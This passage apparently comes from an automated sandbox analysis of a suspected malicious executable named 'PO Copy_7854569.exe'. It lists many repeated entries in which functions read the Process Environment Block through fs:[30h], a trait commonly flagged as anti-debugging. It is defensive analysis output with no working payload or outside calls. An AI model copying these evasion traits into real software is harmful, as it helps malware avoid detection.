            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01670185 mov eax, dword ptr fs:[00000030h]6_2_01670185
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EC188 mov eax, dword ptr fs:[00000030h]6_2_016EC188
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EC188 mov eax, dword ptr fs:[00000030h]6_2_016EC188
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D4180 mov eax, dword ptr fs:[00000030h]6_2_016D4180
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D4180 mov eax, dword ptr fs:[00000030h]6_2_016D4180
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B019F mov eax, dword ptr fs:[00000030h]6_2_016B019F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B019F mov eax, dword ptr fs:[00000030h]6_2_016B019F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B019F mov eax, dword ptr fs:[00000030h]6_2_016B019F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B019F mov eax, dword ptr fs:[00000030h]6_2_016B019F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162A197 mov eax, dword ptr fs:[00000030h]6_2_0162A197
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162A197 mov eax, dword ptr fs:[00000030h]6_2_0162A197
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162A197 mov eax, dword ptr fs:[00000030h]6_2_0162A197
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165C073 mov eax, dword ptr fs:[00000030h]6_2_0165C073
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01632050 mov eax, dword ptr fs:[00000030h]6_2_01632050
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6050 mov eax, dword ptr fs:[00000030h]6_2_016B6050
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162A020 mov eax, dword ptr fs:[00000030h]6_2_0162A020
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162C020 mov eax, dword ptr fs:[00000030h]6_2_0162C020
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6030 mov eax, dword ptr fs:[00000030h]6_2_016C6030
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B4000 mov ecx, dword ptr fs:[00000030h]6_2_016B4000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D2000 mov eax, dword ptr fs:[00000030h]6_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E016 mov eax, dword ptr fs:[00000030h]6_2_0164E016
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E016 mov eax, dword ptr fs:[00000030h]6_2_0164E016
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E016 mov eax, dword ptr fs:[00000030h]6_2_0164E016
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E016 mov eax, dword ptr fs:[00000030h]6_2_0164E016
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0162A0E3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016380E9 mov eax, dword ptr fs:[00000030h]6_2_016380E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B60E0 mov eax, dword ptr fs:[00000030h]6_2_016B60E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162C0F0 mov eax, dword ptr fs:[00000030h]6_2_0162C0F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016720F0 mov ecx, dword ptr fs:[00000030h]6_2_016720F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B20DE mov eax, dword ptr fs:[00000030h]6_2_016B20DE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016280A0 mov eax, dword ptr fs:[00000030h]6_2_016280A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C80A8 mov eax, dword ptr fs:[00000030h]6_2_016C80A8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F60B8 mov eax, dword ptr fs:[00000030h]6_2_016F60B8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F60B8 mov ecx, dword ptr fs:[00000030h]6_2_016F60B8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163208A mov eax, dword ptr fs:[00000030h]6_2_0163208A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D437C mov eax, dword ptr fs:[00000030h]6_2_016D437C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B2349 mov eax, dword ptr fs:[00000030h]6_2_016B2349
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B035C mov eax, dword ptr fs:[00000030h]6_2_016B035C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B035C mov eax, dword ptr fs:[00000030h]6_2_016B035C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B035C mov eax, dword ptr fs:[00000030h]6_2_016B035C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B035C mov ecx, dword ptr fs:[00000030h]6_2_016B035C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B035C mov eax, dword ptr fs:[00000030h]6_2_016B035C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B035C mov eax, dword ptr fs:[00000030h]6_2_016B035C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FA352 mov eax, dword ptr fs:[00000030h]6_2_016FA352
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D8350 mov ecx, dword ptr fs:[00000030h]6_2_016D8350
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0170634F mov eax, dword ptr fs:[00000030h]6_2_0170634F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01708324 mov eax, dword ptr fs:[00000030h]6_2_01708324
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01708324 mov ecx, dword ptr fs:[00000030h]6_2_01708324
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01708324 mov eax, dword ptr fs:[00000030h]6_2_01708324
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01708324 mov eax, dword ptr fs:[00000030h]6_2_01708324
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A30B mov eax, dword ptr fs:[00000030h]6_2_0166A30B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A30B mov eax, dword ptr fs:[00000030h]6_2_0166A30B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A30B mov eax, dword ptr fs:[00000030h]6_2_0166A30B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162C310 mov ecx, dword ptr fs:[00000030h]6_2_0162C310
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01650310 mov ecx, dword ptr fs:[00000030h]6_2_01650310
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016403E9 mov eax, dword ptr fs:[00000030h]6_2_016403E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E3F0 mov eax, dword ptr fs:[00000030h]6_2_0164E3F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E3F0 mov eax, dword ptr fs:[00000030h]6_2_0164E3F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E3F0 mov eax, dword ptr fs:[00000030h]6_2_0164E3F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016663FF mov eax, dword ptr fs:[00000030h]6_2_016663FF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EC3CD mov eax, dword ptr fs:[00000030h]6_2_016EC3CD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A3C0 mov eax, dword ptr fs:[00000030h]6_2_0163A3C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A3C0 mov eax, dword ptr fs:[00000030h]6_2_0163A3C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A3C0 mov eax, dword ptr fs:[00000030h]6_2_0163A3C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A3C0 mov eax, dword ptr fs:[00000030h]6_2_0163A3C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A3C0 mov eax, dword ptr fs:[00000030h]6_2_0163A3C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A3C0 mov eax, dword ptr fs:[00000030h]6_2_0163A3C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016383C0 mov eax, dword ptr fs:[00000030h]6_2_016383C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016383C0 mov eax, dword ptr fs:[00000030h]6_2_016383C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016383C0 mov eax, dword ptr fs:[00000030h]6_2_016383C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016383C0 mov eax, dword ptr fs:[00000030h]6_2_016383C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B63C0 mov eax, dword ptr fs:[00000030h]6_2_016B63C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE3DB mov eax, dword ptr fs:[00000030h]6_2_016DE3DB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE3DB mov eax, dword ptr fs:[00000030h]6_2_016DE3DB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE3DB mov ecx, dword ptr fs:[00000030h]6_2_016DE3DB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE3DB mov eax, dword ptr fs:[00000030h]6_2_016DE3DB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D43D4 mov eax, dword ptr fs:[00000030h]6_2_016D43D4
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D43D4 mov eax, dword ptr fs:[00000030h]6_2_016D43D4
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E388 mov eax, dword ptr fs:[00000030h]6_2_0162E388
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E388 mov eax, dword ptr fs:[00000030h]6_2_0162E388
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E388 mov eax, dword ptr fs:[00000030h]6_2_0162E388
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165438F mov eax, dword ptr fs:[00000030h]6_2_0165438F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165438F mov eax, dword ptr fs:[00000030h]6_2_0165438F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628397 mov eax, dword ptr fs:[00000030h]6_2_01628397
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628397 mov eax, dword ptr fs:[00000030h]6_2_01628397
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628397 mov eax, dword ptr fs:[00000030h]6_2_01628397
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634260 mov eax, dword ptr fs:[00000030h]6_2_01634260
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634260 mov eax, dword ptr fs:[00000030h]6_2_01634260
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634260 mov eax, dword ptr fs:[00000030h]6_2_01634260
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162826B mov eax, dword ptr fs:[00000030h]6_2_0162826B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0274 mov eax, dword ptr fs:[00000030h]6_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B8243 mov eax, dword ptr fs:[00000030h]6_2_016B8243
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B8243 mov ecx, dword ptr fs:[00000030h]6_2_016B8243
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0170625D mov eax, dword ptr fs:[00000030h]6_2_0170625D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162A250 mov eax, dword ptr fs:[00000030h]6_2_0162A250
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636259 mov eax, dword ptr fs:[00000030h]6_2_01636259
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EA250 mov eax, dword ptr fs:[00000030h]6_2_016EA250
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EA250 mov eax, dword ptr fs:[00000030h]6_2_016EA250
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162823B mov eax, dword ptr fs:[00000030h]6_2_0162823B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016402E1 mov eax, dword ptr fs:[00000030h]6_2_016402E1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016402E1 mov eax, dword ptr fs:[00000030h]6_2_016402E1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016402E1 mov eax, dword ptr fs:[00000030h]6_2_016402E1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A2C3 mov eax, dword ptr fs:[00000030h]6_2_0163A2C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A2C3 mov eax, dword ptr fs:[00000030h]6_2_0163A2C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A2C3 mov eax, dword ptr fs:[00000030h]6_2_0163A2C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A2C3 mov eax, dword ptr fs:[00000030h]6_2_0163A2C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A2C3 mov eax, dword ptr fs:[00000030h]6_2_0163A2C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017062D6 mov eax, dword ptr fs:[00000030h]6_2_017062D6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016402A0 mov eax, dword ptr fs:[00000030h]6_2_016402A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016402A0 mov eax, dword ptr fs:[00000030h]6_2_016402A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C62A0 mov eax, dword ptr fs:[00000030h]6_2_016C62A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C62A0 mov ecx, dword ptr fs:[00000030h]6_2_016C62A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C62A0 mov eax, dword ptr fs:[00000030h]6_2_016C62A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C62A0 mov eax, dword ptr fs:[00000030h]6_2_016C62A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C62A0 mov eax, dword ptr fs:[00000030h]6_2_016C62A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C62A0 mov eax, dword ptr fs:[00000030h]6_2_016C62A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E284 mov eax, dword ptr fs:[00000030h]6_2_0166E284
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E284 mov eax, dword ptr fs:[00000030h]6_2_0166E284
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B0283 mov eax, dword ptr fs:[00000030h]6_2_016B0283
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B0283 mov eax, dword ptr fs:[00000030h]6_2_016B0283
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B0283 mov eax, dword ptr fs:[00000030h]6_2_016B0283
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166656A mov eax, dword ptr fs:[00000030h]6_2_0166656A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166656A mov eax, dword ptr fs:[00000030h]6_2_0166656A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166656A mov eax, dword ptr fs:[00000030h]6_2_0166656A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638550 mov eax, dword ptr fs:[00000030h]6_2_01638550
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638550 mov eax, dword ptr fs:[00000030h]6_2_01638550
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6500 mov eax, dword ptr fs:[00000030h]6_2_016C6500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016325E0 mov eax, dword ptr fs:[00000030h]6_2_016325E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C5ED mov eax, dword ptr fs:[00000030h]6_2_0166C5ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C5ED mov eax, dword ptr fs:[00000030h]6_2_0166C5ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E5CF mov eax, dword ptr fs:[00000030h]6_2_0166E5CF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E5CF mov eax, dword ptr fs:[00000030h]6_2_0166E5CF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016365D0 mov eax, dword ptr fs:[00000030h]6_2_016365D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A5D0 mov eax, dword ptr fs:[00000030h]6_2_0166A5D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A5D0 mov eax, dword ptr fs:[00000030h]6_2_0166A5D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B05A7 mov eax, dword ptr fs:[00000030h]6_2_016B05A7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B05A7 mov eax, dword ptr fs:[00000030h]6_2_016B05A7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B05A7 mov eax, dword ptr fs:[00000030h]6_2_016B05A7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016545B1 mov eax, dword ptr fs:[00000030h]6_2_016545B1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016545B1 mov eax, dword ptr fs:[00000030h]6_2_016545B1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01632582 mov eax, dword ptr fs:[00000030h]6_2_01632582
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01632582 mov ecx, dword ptr fs:[00000030h]6_2_01632582
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01664588 mov eax, dword ptr fs:[00000030h]6_2_01664588
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E59C mov eax, dword ptr fs:[00000030h]6_2_0166E59C
